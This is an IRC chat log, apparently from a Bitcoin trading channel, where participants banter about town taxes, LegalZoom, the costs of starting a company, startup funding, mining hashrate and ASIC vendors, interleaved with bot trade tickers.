04:18:32 http://www.legalzoom.com Mar 18 04:18:33 mircea_popescu: why do you think my town issued bonds anyhow? Mar 18 04:18:39 Bugpowder: fuck legalzoom, that shit is a scam Mar 18 04:18:40 cause i doubt any town didn't Mar 18 04:18:43 lol Mar 18 04:18:47 what ?! Mar 18 04:18:58 when did legalzoom become a scam ? Mar 18 04:18:58 mircea_popescu: my town is old enough that it was here before 1776 Mar 18 04:19:10 legalzoom is in trouble in multiple states Mar 18 04:19:25 no need for legal zoom to be a scam, there's a big market for that service Mar 18 04:19:31 Diablo-D3: have they ever finanaced any infrastructure improvements? Mar 18 04:19:34 iirc for practicing law in those states without having a lawyer from those states on staff Mar 18 04:19:35 probably yes Mar 18 04:19:42 Bugpowder: dont think so Mar 18 04:19:44 I wish they would Mar 18 04:19:56 get out, what town is this, potato idaho ? Mar 18 04:20:08 xyz, mass. Mar 18 04:20:15 they had bonds. Mar 18 04:20:16 and like, the high school they built like 15 years ago was all done with federal grants Mar 18 04:20:29 mircea_popescu: yeah, but who buys the bonds? where does the city's income come from? Mar 18 04:20:34 taxes Mar 18 04:20:38 Diablo-D3: you're describing the typical american town Mar 18 04:20:47 and usually pension funds buy some sort of derivative off the bonds Mar 18 04:20:49 mircea_popescu: town doesnt collect taxes though Mar 18 04:20:56 banks hold them and do the packaging/slicing Mar 18 04:21:17 smickles: well, I'm trying to figure out how much its going to cost to get this shit off the ground Mar 18 04:21:18 it's a town witout revenue ? how does it pay fo the mayor/town administrator Mar 18 04:21:30 [BTCTC] [ASICMINER-PT] 2 @ 0.85 = 1.7 BTC [-] Mar 18 04:21:38 mircea_popescu: I dunno, how DO towns collect taxes? Mar 18 04:21:47 usually you pay for water and sewage Mar 18 04:21:56 often enough there's a tax on power distribution Mar 18 04:21:59 ahh, I dont pay for either of those Mar 18 04:22:04 some with local sales tax Mar 18 04:22:09 and Im not taxed directly for power, so its on my bill somewhere Mar 18 04:22:09 they get income from cell companies towers, from billboards on town limits Mar 18 04:22:11 some with local property tax Mar 18 04:22:11 from various fines Mar 18 04:22:12 and we dont have local sales tax Mar 18 04:22:13 it's a list Mar 18 04:22:23 and I dont think we have local property tax either Mar 18 04:22:38 yeah, local fines, police quotas Mar 18 04:22:54 heh, we have like 6 cops Mar 18 04:23:07 they couldnt quota if they tried Mar 18 04:23:18 nothing happens in this town Mar 18 04:23:19 ever Mar 18 04:23:32 like, it was big news a few years back some dickhead graffitied on the side of a building Mar 18 04:23:35 well... if the yearly budget is like 10mn or somesuch maybe they never issued paper Mar 18 04:23:37 thats never happened before Mar 18 04:24:00 dont you pay property taxes diablo? Mar 18 04:24:06 tiberiusiv: I dont own property Mar 18 04:24:13 he sublets from pigeons Mar 18 04:24:15 your landlord Mar 18 04:24:20 but Im pretty sure the only property taxes we pay is to the state Mar 18 04:24:32 no you are wrong Mar 18 04:24:39 dude, do you live here? Mar 18 04:24:54 ive lived in a bunch of US states Mar 18 04:24:55 http://www.boston.com/news/local/massachusetts/graphics/08_22_10_property_tax/ Mar 18 04:24:56 [MPEX] [S.MPOE] 5100 @ 0.0007144 = 3.6434 BTC [-] Mar 18 04:24:57 look it up there. Mar 18 04:25:04 the state doesn't do property taxes, they're a local concern. Mar 18 04:25:04 mircea_popescu: I live in maine lol. Mar 18 04:25:09 ah Mar 18 04:25:23 smickles: but yeah, basically, I wanna do DMC legit. Mar 18 04:25:48 smickles: all the paperwork, all the is dotted and ts crossed Mar 18 04:26:03 smickles: mircea_popescu thinks I'll spend like $50k Mar 18 04:26:07 whats DMC? Mar 18 04:26:18 !l glbse dmc Mar 18 04:26:19 Last trade for DMC on GLBSE was at 0.0666 BTC [-] Mar 18 04:26:20 tiberiusiv: an uncompany. Mar 18 04:26:41 Diablo-D3: for the 'green' dc/mining op, i could see 50k in organizational expenses Mar 18 04:26:42 what are you trying to do Mar 18 04:26:53 kakobrekla: you know whats ironic? we're now paying more dividends than we ever did on glbse Mar 18 04:27:03 tiberiusiv: long story. Mar 18 04:27:08 ironic? thats what alanis thought. Mar 18 04:27:10 it just sad. Mar 18 04:27:13 Bugpowder http://legalzoomfraud.blogspot.ro/2008/05/use-of-forms-leads-to-litigation.html that one's cute Mar 18 04:28:03 if you have the time to research tings yourself, sites like legalzoom just seem silly Mar 18 04:28:26 that site looks legit Mar 18 04:28:29 yeah, I think legalzoom really is a scam Mar 18 04:28:31 smickles basically some guy made a trust, but didn't properly account for revocation Mar 18 04:28:35 Bugpowder: it looks TOO legit Mar 18 04:28:37 his wife died, he couldn't revoke the trust Mar 18 04:28:37 thats the problem Mar 18 04:29:38 Diablo-D3 for people with a clue, which mostly means 10 years as a paralegal and up, it's a useful shortcut Mar 18 04:29:48 everyone else has not much business there other than for entertainment purposes. Mar 18 04:29:56 meh I wish people I knew in high school wernt all potheads or drunks Mar 18 04:30:05 you'd think ONE of them would have become a lawyer Mar 18 04:30:10 this is why parents strive to take kids to good school districts. Mar 18 04:30:28 I'd be like "remember that one time I saved you from that bully?" Mar 18 04:30:40 hed be like "no" Mar 18 04:30:42 the question of course becomes why arent YOU a lawyer Mar 18 04:30:53 mircea_popescu: because law doesn't interest me that way Mar 18 04:30:57 he was one of the pothead or drunks Mar 18 04:31:00 you could now provide free expert advice to all the potheads who saved you from each other. Mar 18 04:31:01 also there is a lot disciplines Mar 18 04:31:01 :D Mar 18 04:31:04 tiberiusiv: I neither smoke nor drink. Mar 18 04:31:14 mircea_popescu: ha ha, I never needed saving. Mar 18 04:31:16 you need a corporate law transactional lawyer Mar 18 04:31:30 Bugpowder he's married to the wrong girl isnt he. Mar 18 04:31:32 mircea_popescu: I was the tallest kid in my grade until my junior year Mar 18 04:31:46 iwas the tallest guy in my grade all through college. Mar 18 04:31:54 yeah, so you know what its like then Mar 18 04:32:00 it's pretty cool. Mar 18 04:32:00 Basically everyone is but me Mar 18 04:32:11 Bugpowder lol. Mar 18 04:32:17 it was usually kids from my class picking on kids from the class under us Mar 18 04:32:23 yes yes, i'm envious. choke on it!!1 Mar 18 04:32:40 somehow I became the good guy. not sure what went wrong there. Mar 18 04:32:43 Diablo-D3: Why not go to your state's bar association website and use their legal referral service to find a local laywer that specializes in your field of question Mar 18 04:33:01 then send some people to beat him up, come by and save him Mar 18 04:33:10 for 20 bucks worth of pot you've got yourself a friend. Mar 18 04:33:18 mircea_popescu: lol Mar 18 04:33:21 you think people here buy pot? Mar 18 04:33:22 fuck no Mar 18 04:33:27 meth, whatever. Mar 18 04:33:32 everyone has an attic or basement, and its full of growlights Mar 18 04:33:33 you just said they're potheads Mar 18 04:33:39 o srsly ? Mar 18 04:33:45 yeah, its fucking maine Mar 18 04:33:48 we dont have that much money Mar 18 04:33:53 what sort of fucking fantasia is this, a town with 6 cops and 6000 growlights Mar 18 04:34:05 mircea_popescu: /me shrugs Mar 18 04:34:17 portland oregon Mar 18 04:34:17 Arcata Mar 18 04:34:18 theres a few kids in jail too, but they were the drunks Mar 18 04:34:19 soon enough half california is moving there Mar 18 04:34:23 Humbolt Mar 18 04:34:33 Bugpowder i know a chick that went to humbolt. she hated it. Mar 18 04:34:45 ;;calc 75/(1-.001) Mar 18 04:34:46 75.0750750751 Mar 18 04:34:47 and I think like half the girls were pregnant before they would have got out of college if they had actually went Mar 18 04:34:52 Portland Maine? Mar 18 04:34:57 Bugpowder: farther north. Mar 18 04:35:01 at least you got the right state Mar 18 04:35:20 the thing with maine is, no matter what you pick ppl go "further north" Mar 18 04:35:24 Caribou Mar 18 04:35:51 Bugpowder: not that far north damnit Mar 18 04:35:57 caribou isnt even part of maine anymore Mar 18 04:36:05 they all speak french up there and shit Mar 18 04:36:09 fucking canadians Mar 18 04:36:12 ha Mar 18 04:37:04 seriously, if one of my neighbors goes "eh, those hosers, eh?" Im going to slug them Mar 18 04:37:58 aggro much? Mar 18 04:38:07 I hate canada :< Mar 18 04:38:26 smickles: but yeah, no wonder the US economy is in shambles Mar 18 04:38:35 smickles: it costs $50k to start a company the right way Mar 18 04:38:54 O_o Mar 18 04:39:56 Diablo-D3: I don't think so Mar 18 04:39:58 depends a lot on the sort of company you're starting. Mar 18 04:40:05 mircea_popescu: the kind that makes money Mar 18 04:40:06 [MPEX] [S.MPOE] 14726 @ 0.00070743 = 10.4176 BTC [-] Mar 18 04:40:06 [MPEX] [S.MPOE] 6074 @ 0.00071737 = 4.3573 BTC [+] Mar 18 04:40:14 Get an angel Mar 18 04:40:20 it's more of the case of, "the kind you shouldn't be starting if you're poor" Mar 18 04:40:22 If your idea is so great Mar 18 04:40:31 believe it or not there is such a subset. Mar 18 04:40:37 mircea_popescu: that'd be anything that makes money Mar 18 04:40:40 The angel funding environment is better than it has ever been Mar 18 04:40:47 Diablo-D3: actually, Smickles Accounting Services, a limited company is profitable as of today Mar 18 04:40:49 pretty much everything involving the handling of money is not something that should be done by people without the experience of handling money. Mar 18 04:40:54 like, I could, pretty much, overnight fuck Amazon's cloud business over hard Mar 18 04:40:59 it'd just cost about $100m =/ Mar 18 04:41:14 Bugpowder has a point there. if organised freakshows / circus acts a la what gets funded by ycombinator can get 500k Mar 18 04:41:20 anybody could, but how much would it make you Mar 18 04:41:21 pretty much a walking zombie could get 50k Mar 18 04:41:34 I dont live in california though Mar 18 04:41:37 granted it might be harder in maine Mar 18 04:41:39 or nyc Mar 18 04:41:46 why not move? Mar 18 04:41:53 train from maine to nyc costs you less than what you can panhandle in a day Mar 18 04:41:54 because moving wouldnt do anything Mar 18 04:42:01 maine is the optimum location for this business Mar 18 04:42:06 we've been in operation since jan14 this year, and today we just overcame the organizational expeses Mar 18 04:42:06 dude. just visit. Mar 18 04:42:11 smickles wd! Mar 18 04:42:13 mircea_popescu: visit _what_ Mar 18 04:42:16 nyc. Mar 18 04:42:18 thx :) Mar 18 04:42:23 go there suck up to angels. Mar 18 04:42:24 dude, I know no one in nyc Mar 18 04:42:25 find some angles Mar 18 04:42:30 I dont even own a fucking suit Mar 18 04:42:36 listen, i knew no one in any town i went to. Mar 18 04:42:47 it takes what, two hours to pick up a chick get shown around. Mar 18 04:42:51 and that if you lunch. Mar 18 04:43:01 goddamnit, whoever runs whatever shoutcast station Im listening to, STOP SENDING GARBAGE THROUGH THE PIPE Mar 18 04:43:08 I think Im deaf in one ear now Mar 18 04:43:25 it is called "shout"cast aint it Mar 18 04:43:28 mircea_popescu: you're one of those type A personalities though Mar 18 04:43:31 Im not Mar 18 04:43:32 you might not be good at starting a business Mar 18 04:43:38 you need a partner Mar 18 04:43:40 type a for asshole ? Mar 18 04:43:54 Bugpowder: yeah, and who would I trust for that job? Mar 18 04:44:09 Ive given people tiny little bits of trust, and look what they do with it Mar 18 04:44:11 Well, you could try to present your idea to some freshly minted MBAs Mar 18 04:44:16 Bugpowder incidentally, i think he's describing the problem that keeps 90% from all ventures from happening. Mar 18 04:44:33 Many business schools have courses where people come pitch their idea Mar 18 04:44:40 and MBAs link up with them Mar 18 04:44:41 people with technical ability tend to be shy and suspicious. not trying to imply he has any technical ability ofcourse :D Mar 18 04:45:04 there are more MBAs out there than good ideas / people with skills Mar 18 04:45:25 mircea_popescu: oh gee thanks Mar 18 04:45:35 i got your back bro :D Mar 18 04:45:44 You just need to find a decent MBA dude to partner with Mar 18 04:45:48 I'd like to have a cofounder Mar 18 04:45:52 you should Mar 18 04:45:56 but I don't want to be stuck as the technical cofounder Mar 18 04:46:02 you should have 2-3 people Mar 18 04:46:04 dude Mar 18 04:46:07 ideally 3. Mar 18 04:46:09 you are stuck as nothing right now Mar 18 04:46:09 I'd like to have someone who isn't an idiot when it comes to technology Mar 18 04:46:20 usagi: zuckerberg stole an idea and then sued his way out of trouble Mar 18 04:46:21 3 is the magic number. if you get a chick and you both do her especially. Mar 18 04:46:31 usagi: he had OTHER people do the technical work nearly for free Mar 18 04:46:34 consider the word 'company' Mar 18 04:46:38 usagi: the fucker doesn't even know how to program Mar 18 04:46:46 Diablo-D3 same thing happened with the steves Mar 18 04:46:47 smickles: yes, and consider what an LLC is Mar 18 04:46:52 jobs pretty much fucked over woz Mar 18 04:47:05 Diablo-D3: heh, i have a simple business tho Mar 18 04:47:10 mircea_popescu: I still think steve jobs died in 1984 Mar 18 04:47:12 Diablo-D3: You could start by reading ALL OF THIS. http://blakemasters.com/peter-thiels-cs183-startup/ Mar 18 04:47:15 mircea_popescu: and its just bee a massive coverup ever since Mar 18 04:47:22 >peter thiel Mar 18 04:47:24 oh hai Mar 18 04:47:29 it's just one perspective, but it a better one than you have right now Mar 18 04:47:31 [MPEX] [S.MPOE] 12580 @ 0.00071737 = 9.0245 BTC [+] Mar 18 04:47:53 signed. Mar 18 04:48:24 $mpexlag Mar 18 04:48:25 smickles: 0.099424123764 seconds Mar 18 04:48:38 what's the other one? Mar 18 04:48:41 zee outrage Mar 18 04:48:47 ;;goxlag Mar 18 04:48:49 0.131244 seconds Mar 18 04:48:50 $email Mar 18 04:48:51 smickles: No new messages received. Mar 18 04:48:59 inbox 0 Mar 18 04:49:02 hells ya Mar 18 04:49:05 $email Mar 18 04:49:06 mircea_popescu: No new messages received. Mar 18 04:49:08 cool. Mar 18 04:49:09 Delaware's Div of Corporations charges $1,000 for 1 hour processing. For when you absolutely, positively must incorporate by lunchtime Mar 18 04:49:26 1 hour processing?!! Mar 18 04:49:36 pretty cool service actually. Mar 18 04:49:42 i waited like 2 months D: Mar 18 04:49:54 and they lost my paperwork the first time Mar 18 04:50:00 smickles in exchange, you paid your organisational expenses by march 18th :D Mar 18 04:50:00 Delaware's 2012 rev = $3.36 billion, 30% of which (abt $985M) was from franchise+corp taxes+biz fees Mar 18 04:50:13 mircea_popescu: heh, yeah :) Mar 18 04:50:44 $mpexlag Mar 18 04:50:45 mircea_popescu: 0.115979194641 seconds Mar 18 04:50:50 fucking bs routers Mar 18 04:51:33 that's 'a startup' tho, they play by different rules Mar 18 04:51:33 usagi: I've heard this, and yes, I agree Mar 18 04:51:40 smickles: this is still a startup Mar 18 04:51:48 smickles: it just has a massive scope Mar 18 04:51:48 ha Mar 18 04:51:55 what is 'this'? Mar 18 04:52:00 Bugpowder: dmc 2.0 Mar 18 04:52:20 First, drop the 2.0. Call it DMC^2 Mar 18 04:52:24 haha Mar 18 04:52:39 Bugpowder: hurrr, its not actually going to be called dmc 2.0 Mar 18 04:52:45 i tihnk in about five years the cost of a seat on this chan will be like... 30 btc. Mar 18 04:52:48 I have a name picked out Mar 18 04:52:52 DMC^2 is something like bbbb? Mar 18 04:53:04 a grown man's fantasy? Mar 18 04:53:09 yes Mar 18 04:53:17 kakobrekla: huh? Mar 18 04:53:21 lol Mar 18 04:53:32 kakobrekla: I dont get the reference Mar 18 04:53:39 its ok. Mar 18 04:55:16 https://bitcointalk.org/index.php?topic=85829.msg1634650#msg1634650 Mar 18 04:55:23 hey look at that, ciuciu has funds now Mar 18 04:56:50 anyhow Mar 18 04:57:04 I dunno, I think where I failed with DMC is I paired the plan down too small Mar 18 04:57:37 shoulda left it with 1 mio btc Mar 18 04:58:08 kakobrekla: yeah, and I shouldnt have paired it down to only a dozen or two racks Mar 18 04:58:29 the original plan I didn't show anyone in the bitcoin community was on the order of a hundred racks or more Mar 18 04:59:07 using today's tech, I can pretty much take $100m and have more storage than Amazon, and they're currently the largest public storage pool available Mar 18 04:59:43 do you think that is why they are winning? Mar 18 04:59:53 they have the most drives? Mar 18 05:00:00 Bugpowder: yes, I actually do Mar 18 05:00:04 they're physically the biggest Mar 18 05:00:14 its not because they're a successful bookstore. Mar 18 05:00:43 You are familiar with the Yegge rant right? Mar 18 05:00:45 hum Mar 18 05:00:46 (oddly enough, I finally ordered a book from them for the first time, and I've done thousands of dollars of business with them over the past however many years) Mar 18 05:01:03 Bugpowder: maybe, url? Mar 18 05:02:00 https://plus.google.com/112678702228711889851/posts/eVeouesvaVX Mar 18 05:02:20 1) All teams will henceforth expose their data and functionality through service interfaces. 2) Teams must communicate with each other through these interfaces. 3) There will be no other form of interprocess communication allowed: Mar 18 05:02:34 5) All service interfaces, without exception, must be designed from the ground up to be externalizable. Mar 18 05:02:38 6) Anyone who doesn't do this will be fired. Mar 18 05:02:48 [MPEX] [S.MPOE] 5000 @ 0.00070735 = 3.5368 BTC [-] Mar 18 05:02:50 [MPEX] [S.MPOE] 13800 @ 0.00070573 = 9.7391 BTC [-] Mar 18 05:02:58 oh heh, I've read this one Mar 18 05:03:23 Bugpowder: however, I agree with jeff bezos's mandate Mar 18 05:03:30 he basically did what IBM already did in the 60s Mar 18 05:03:57 http://polimedia.us/dtng/c/src/136357582265.png check out this work of cubism Mar 18 05:04:02 Nikkei is NOT happy Mar 18 05:04:16 mircea_popescu: lol? Mar 18 05:04:31 Bugpowder ya asian mkts are getting the hammering Mar 18 05:04:51 aiight Mar 18 05:05:11 I'm going to bed. Wasted enough time here... See ya next week. Mar 18 05:05:33 Panic will commence at 0700 hours tomorrow morning Mar 18 05:05:38 personal panic Mar 18 05:05:46 why? Mar 18 05:07:29 heh Mar 18 05:07:46 sigh. Mar 18 05:07:56 I dunno. Mar 18 05:08:04 I want DMC 2.0 to be successful Mar 18 05:10:04 https://smickles.com/mpex-gui/ << love it peeps Mar 18 05:11:39 kakobrekla: were you the one who mentioned working on a kalman filter based trade bot? Mar 18 05:12:08 yeah what about it Mar 18 05:12:25 how's the project been doing? Mar 18 05:12:53 ah well i have build various indicators based on it Mar 18 05:13:23 packing the latest one into a bot as we speak Mar 18 05:13:50 [BTCTC] [BASIC-MINING] 1 @ 0.33318 BTC [-] Mar 18 05:14:16 neat. I thought it sounded promising :) Mar 18 05:14:48 is not bad at all Mar 18 05:20:42 [MPEX] [S.MPOE] 24044 @ 0.00071737 = 17.2484 BTC [+] Mar 18 05:28:25 mircea_popescu that didnt take long https://bitcointalk.org/index.php?topic=151354.msg1636288#msg1636288 Mar 18 05:28:47 haha cool Mar 18 05:28:48 moar https://bitcointalk.org/index.php?topic=154272.msg1636282#msg1636282 Mar 18 05:29:09 this will end in tears. Mar 18 05:29:15 hm Mar 18 05:29:25 looks to me like a lot of newcomers drinking the visibility coolaid Mar 18 05:32:37 ;;later tell bugpowder you know that google rant was useful. i still don't think facebook is worth over 10 bucks but at least i understand now why it's not worth zero. Mar 18 05:32:38 The operation succeeded. Mar 18 05:35:18 mircea_popescu: that rant popped up on HN shortly after it was posted Mar 18 05:35:21 I enjoyed it Mar 18 05:35:59 i don't really follow/care about them gizmo corps Mar 18 05:36:13 you're not technically minded, thats why Mar 18 05:37:19 i am technically minded, i just don't happen to be a hipster. Mar 18 05:37:33 I find large scale data storage a very interesting topic Mar 18 05:37:40 in and of itself, sure. Mar 18 05:37:44 I dont really care for what facebook actually is though Mar 18 05:37:57 the dickering, bickering, woes and troubles of wanna-be tech corps like google etc however... Mar 18 05:37:59 I dont even have a facebook account Mar 18 05:38:12 it'd be of interest if i were trying to marry a google paycheck or something. Mar 18 05:38:22 I dunno, I may just replace google at some point Mar 18 05:38:33 google is a defective product. Mar 18 05:40:10 well it works alright for google. not so well long term for many users Mar 18 05:40:37 yeah, I dont care about shareholder masturbation Mar 18 05:40:41 it doesn't provide me any value Mar 18 05:40:56 money, well, doesn't really have that much of a grip in me Mar 18 05:41:08 I'm more about the learning and doing, not the owning Mar 18 05:41:54 then you should get a job Mar 18 05:41:58 starting companies is not for you. Mar 18 05:42:18 mircea_popescu: no company exists that can do what I want. Mar 18 05:42:27 so that, too, is something I must do. Mar 18 05:42:36 not how this works. Mar 18 05:42:47 yes, this is whats wrong with this planet Mar 18 05:42:48 if there's no company that does what you want and you can;'t start one, you sit and cry till someone else makes it Mar 18 05:42:54 you don't become magically qualified just because. Mar 18 05:43:05 I'm more than qualified to do the technical work Mar 18 05:43:11 that's besides the point. Mar 18 05:43:12 I'd rather delegate the actual business shit to someone else Mar 18 05:43:23 only people who understand and productively apply owning things can start companies. Mar 18 05:43:26 I haven't found anyone particularly qualified for the position Mar 18 05:43:27 that's the entire point. owning. Mar 18 05:43:45 "productively owning things" Mar 18 05:43:48 yea Mar 18 05:43:52 productivity does not come out of owning things. Mar 18 05:43:56 o yes it does. Mar 18 05:44:02 the only source of productivity is ownership. Mar 18 05:44:15 then I must be the richest person on the planet. Mar 18 05:44:35 or just the person with the worst instrumentation. Mar 18 05:44:47 the things I care about simply cannot be bought. Mar 18 05:45:02 ;;ticker Mar 18 05:45:03 BTCUSD ticker | Best bid: 47.30011, Best ask: 47.49999, Bid-ask spread: 0.19988, Last trade: 47.50000, 24 hour volume: 17273.34835843, 24 hour low: 46.81000, 24 hour high: 47.75000, 24 hour vwap: 47.47338 Mar 18 05:45:05 this is why money just doesn't feature that big in my life. Mar 18 05:45:25 ya well... that's fine, but you'll never go anywhere with a company. Mar 18 05:45:39 mircea_popescu: I think you've misunderstood somewhere. Mar 18 05:45:45 possibly. Mar 18 05:45:48 Any company I run will be highly efficient. Mar 18 05:46:06 more like, you'll wish for any company you run to be highly efficient. Mar 18 05:46:09 It will not be one of these… whatever the fuck you call companies like IBM or Google Mar 18 05:46:19 all this money wasted on dumb shit Mar 18 05:46:53 I mean, yes, I understand this is how all shareholder owned companies work Mar 18 05:46:57 osbourne? Mar 18 05:47:16 [BTCTC] [ASICMINER-PT] 1 @ 0.8748 BTC [+] Mar 18 05:47:16 they're highly inefficient and do not put money into improving the user experience. Mar 18 05:47:19 s/user/customer/ Mar 18 05:47:29 I have no interest in even working for such companies. Mar 18 05:47:40 They simply can't do what I need them to do. Mar 18 05:48:16 I mean, hell, if Google was serious about becoming the Internet or whatever nonsense they have cooked up this week, they'd just go private already and go back to work. Mar 18 05:48:53 mircea_popescu: companies exist for one reason and one reason only Mar 18 05:48:54 to make money. Mar 18 05:49:38 <[\\\]> Unless they're NPO Mar 18 05:49:39 any company who is inefficient enough to leave money on the table like that simply does not deserve to exist Mar 18 05:49:52 amazon could have cornered the entire cloud market Mar 18 05:49:59 they could have bankrupted almost every competitor Mar 18 05:50:02 and they haven't. Mar 18 05:50:06 they screwed up. Mar 18 05:52:09 bank commercials tell me all the time how much they care about me tho Mar 18 05:52:30 they care about your money Mar 18 05:52:34 they dont care about you. Mar 18 05:52:40 and since they you dont have any money Mar 18 05:52:44 they care even less about you. Mar 18 05:52:51 so they're not going to come to my daughters graduation then? Mar 18 05:52:54 rude pricks Mar 18 05:53:08 statefarm insurance is a good neighbor Mar 18 05:53:26 D3 i don't have money? lulz Mar 18 05:53:28 okey Mar 18 05:53:29 no, but they'll be happy to loan her money she can never repay to go to college. Mar 18 05:53:40 BitHub: unless you;re a millionare, no. Mar 18 05:53:51 ahh i see Mar 18 05:54:07 real money Mar 18 05:54:16 yeah, real money Mar 18 05:56:27 company = being a target Mar 18 05:57:43 going outside = being a target Mar 18 05:58:01 get a bigger gun Mar 18 05:58:30 i must be the only person lucky enough to roll without burners Mar 18 05:58:56 here i mean Mar 18 05:59:07 everyone is gunned up heh Mar 18 06:11:35 we ever figure out why the nextwork wqas on fire? Mar 18 06:11:50 bfl avalon, asicminer or luck? Mar 18 06:12:21 and yeah, lots of guns and rottwilers here.... Mar 18 06:12:34 ;;bc,stats Mar 18 06:12:36 Current Blocks: 226490 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 1317 blocks | Next Difficulty In About: 6 days, 7 hours, 14 minutes, and 4 seconds | Next Difficulty Estimate: 6163571.41569 | Estimated Percent Change: 27.14563 Mar 18 06:12:38 good to have just in case :) Mar 18 06:12:57 27% jump, seems like we slowed down a bit Mar 18 06:13:10 slowed down? Mar 18 06:13:17 ;;ticker Mar 18 06:13:19 BTCUSD ticker | Best bid: 47.56250, Best ask: 47.69095, Bid-ask spread: 0.12845, Last trade: 47.69098, 24 hour volume: 17248.04188473, 24 hour low: 46.81000, 24 hour high: 47.75000, 24 hour vwap: 47.47479 Mar 18 06:13:33 it was a bit faster 12 hours ago Mar 18 06:13:49 ya well it goes up and down Mar 18 06:14:04 yeah, after 12 hours anyone figure out why? i had to sleep :/ Mar 18 06:14:04 mostly up tho Mar 18 06:14:23 ahhhhhh coooffffeeeeee :D Mar 18 06:14:42 ;;bc,nethash Mar 18 06:14:43 47262.136161641218 Mar 18 06:15:28 https://bitcointalk.org/index.php?topic=129354.msg1635878#msg1635878 Mar 18 06:15:49 i don't get this. is he a hoster that doesn't understand hosting ? Mar 18 06:16:04 we were at 54 th last night Mar 18 06:16:20 i hope it was not bfl... Mar 18 06:16:51 asicminer is down 1 th, hmmm Mar 18 06:17:42 what a losers Mar 18 06:17:51 what do they specifically claim, 10th ? Mar 18 06:17:56 asicminer i mean Mar 18 06:18:05 nothing Mar 18 06:18:28 they claim to have created 12th worth of chip Mar 18 06:18:41 no, we can see their account on btcguild it was 6.2 th last night, it is now 5.2 Mar 18 06:19:05 dub ya but iirc about six weeks after "delivery" they were hashing with 6th Mar 18 06:19:07 there is some guy on ozcoin with 3 th but we dont think it is asicminer, might be avalon "testing" Mar 18 06:19:08 or 50% capacity. Mar 18 06:19:20 mircea_popescu: yes Mar 18 06:19:20 never was explained, the whys. have they yet got it up to the promised 12 ? Mar 18 06:19:27 yeah asicminer has had some problems that were not explained Mar 18 06:19:32 they said 'power and cable problem' Mar 18 06:19:41 or cooling Mar 18 06:19:43 ya well... Mar 18 06:19:44 i suspect 'premine' is the reason for avalon delays.. aritificial Mar 18 06:19:45 fans, obviously Mar 18 06:19:49 yeah power problems so moved tonew place, cant get the right staff... stuff like that Mar 18 06:20:01 kakobrekla how do you mean ? Mar 18 06:20:04 they did say they want to be full up with the whole 60 th by the end of april Mar 18 06:20:13 well peeps reported 'a lot' of dust in the units Mar 18 06:20:22 meaning 'extensive testing' Mar 18 06:20:26 i would call that "testing" Mar 18 06:20:31 :) Mar 18 06:20:40 yeah the brackets are the problem. Mar 18 06:20:58 oh Mar 18 06:21:06 they get 1500 usd back in a week Mar 18 06:21:10 or something Mar 18 06:21:17 and then sell for another 1500 Mar 18 06:21:22 :) Mar 18 06:21:39 if they are short on company funds i think it would be hard not to "test" and get the money back. Mar 18 06:22:05 kakobrekla: probably only a little testing done outside in teh dirt Mar 18 06:22:15 im serious this is china, expect anything Mar 18 06:22:23 and alos nothing Mar 18 06:22:30 lol Mar 18 06:23:02 dunno why they dont sell modules only Mar 18 06:23:24 id stick one imah computah Mar 18 06:23:34 well in theory their model wins Mar 18 06:23:49 it just requires competence/honesty etc Mar 18 06:24:15 like you have fucking fabbed silicon, how do you fuck up supplying enough power and cooling to it Mar 18 06:24:42 im talkin bout avalon Mar 18 06:24:54 oh Mar 18 06:24:55 are they having these issues too? Mar 18 06:25:35 I think Jeff said his had some heat issues Mar 18 06:25:51 dub basically the #1 problem with cowboy runs are the chip reliability. Mar 18 06:26:01 that's pretty much my main concern. hash hours per chip. Mar 18 06:26:04 across the board. Mar 18 06:26:27 anyone can fab silicon. doing it in any sort of comercially useful way however... Mar 18 06:26:39 ima gonna try to get a fury board if it will be for sale Mar 18 06:27:15 fury was the sea of hashers pga crowd? Mar 18 06:27:25 ya Mar 18 06:27:26 are they busting out an asic too? Mar 18 06:27:31 ya Mar 18 06:27:56 he gave me the sea of hashers source yesterday Mar 18 06:28:09 i gave it to someone to jerk around with Mar 18 06:29:11 but i just sold my last fpga Mar 18 06:29:21 i think i would buy a box and buy an aircon unit and my avalon in it if i had one... Mar 18 06:29:28 keep that shit on ice Mar 18 06:31:37 btc crawling up, good sign for the week? Mar 18 06:35:38 or GFC 2.0 Mar 18 06:42:48 Does that looks nice at all to anyone? http://www.namworld.net/pf/bitvps.com/openvz-vps Mar 18 06:43:54 I like that, Namworld Mar 18 06:44:46 It can always be better however. Feedback on any elements or the whole would be appreciated. Mar 18 06:46:54 It's a little bit wide.. If I have my 1920x screen cut in half, I have to expand the browser window... it looks like there is room to make the list expansive rather than fixed, or with a narrower min-width Mar 18 06:47:47 they look like little racks <3 Mar 18 06:48:23 whats amazing about the litecoin crowd is they do not understand that bitcoin asics also increase litecoin difficulty Mar 18 06:48:46 That's pretty much what they're intended to look like. Little racked servers. Mar 18 06:49:03 [MPEX] [S.MPOE] 4500 @ 0.00071737 = 3.2282 BTC [+] Mar 18 06:49:31 Do you do colocation at all? Mar 18 06:49:49 No, we don't offer that. Mar 18 06:50:43 It might be good to put the connection speed along with the bandwidth Mar 18 06:52:31 Well since it's VPSes the cables are kind of shared so... there's no definite guaranteed speed. Mar 18 06:52:46 Might vary depending on the server size too. Mar 18 06:52:59 All depends on the machine the VPS is on and others. Mar 18 06:53:17 Okay Mar 18 06:54:08 [MPEX] [S.MPOE] 12100 @ 0.00070573 = 8.5393 BTC [-] Mar 18 06:54:11 [MPEX] [S.MPOE] 12211 @ 0.00070201 = 8.5722 BTC [-] Mar 18 07:02:36 https://www.youtube.com/watch?feature=player_embedded&v=_t39jCXXIrY Mar 18 07:02:38 man Mar 18 07:02:40 this video is lol Mar 18 07:07:45 http://trilema.com/2013/happy-first-birthday-mpex/ Mar 18 07:07:47 lalala Mar 18 07:11:16 do we get cake? Mar 18 07:12:42 i do Mar 18 07:13:45 Seems like he really caught the Bitcoin bug Mar 18 07:16:27 [BTCTC] [COG.F] 2 @ 2.5 = 5 BTC Mar 18 07:16:31 [BTCTC] [COG.F] 8 @ 2.5 = 20 BTC Mar 18 07:16:33 [BTCTC] [COG.F] 3 @ 2.5 = 7.5 BTC Mar 18 07:16:35 [BTCTC] [COG.F] 4 @ 2.5 = 10 BTC Mar 18 07:17:32 Namworld: yeah really Mar 18 07:17:34 I mean Mar 18 07:17:39 didnt he show up to that one bitcoin convention? Mar 18 07:17:43 the one in london? Mar 18 07:18:28 Not sure. Mar 18 07:22:45 Look. A bucket shop. Mar 18 07:23:54 wassup? Mar 18 07:25:04 Eheh, not by much apparently. Mar 18 07:27:09 [BTCTC] [GSDPT] 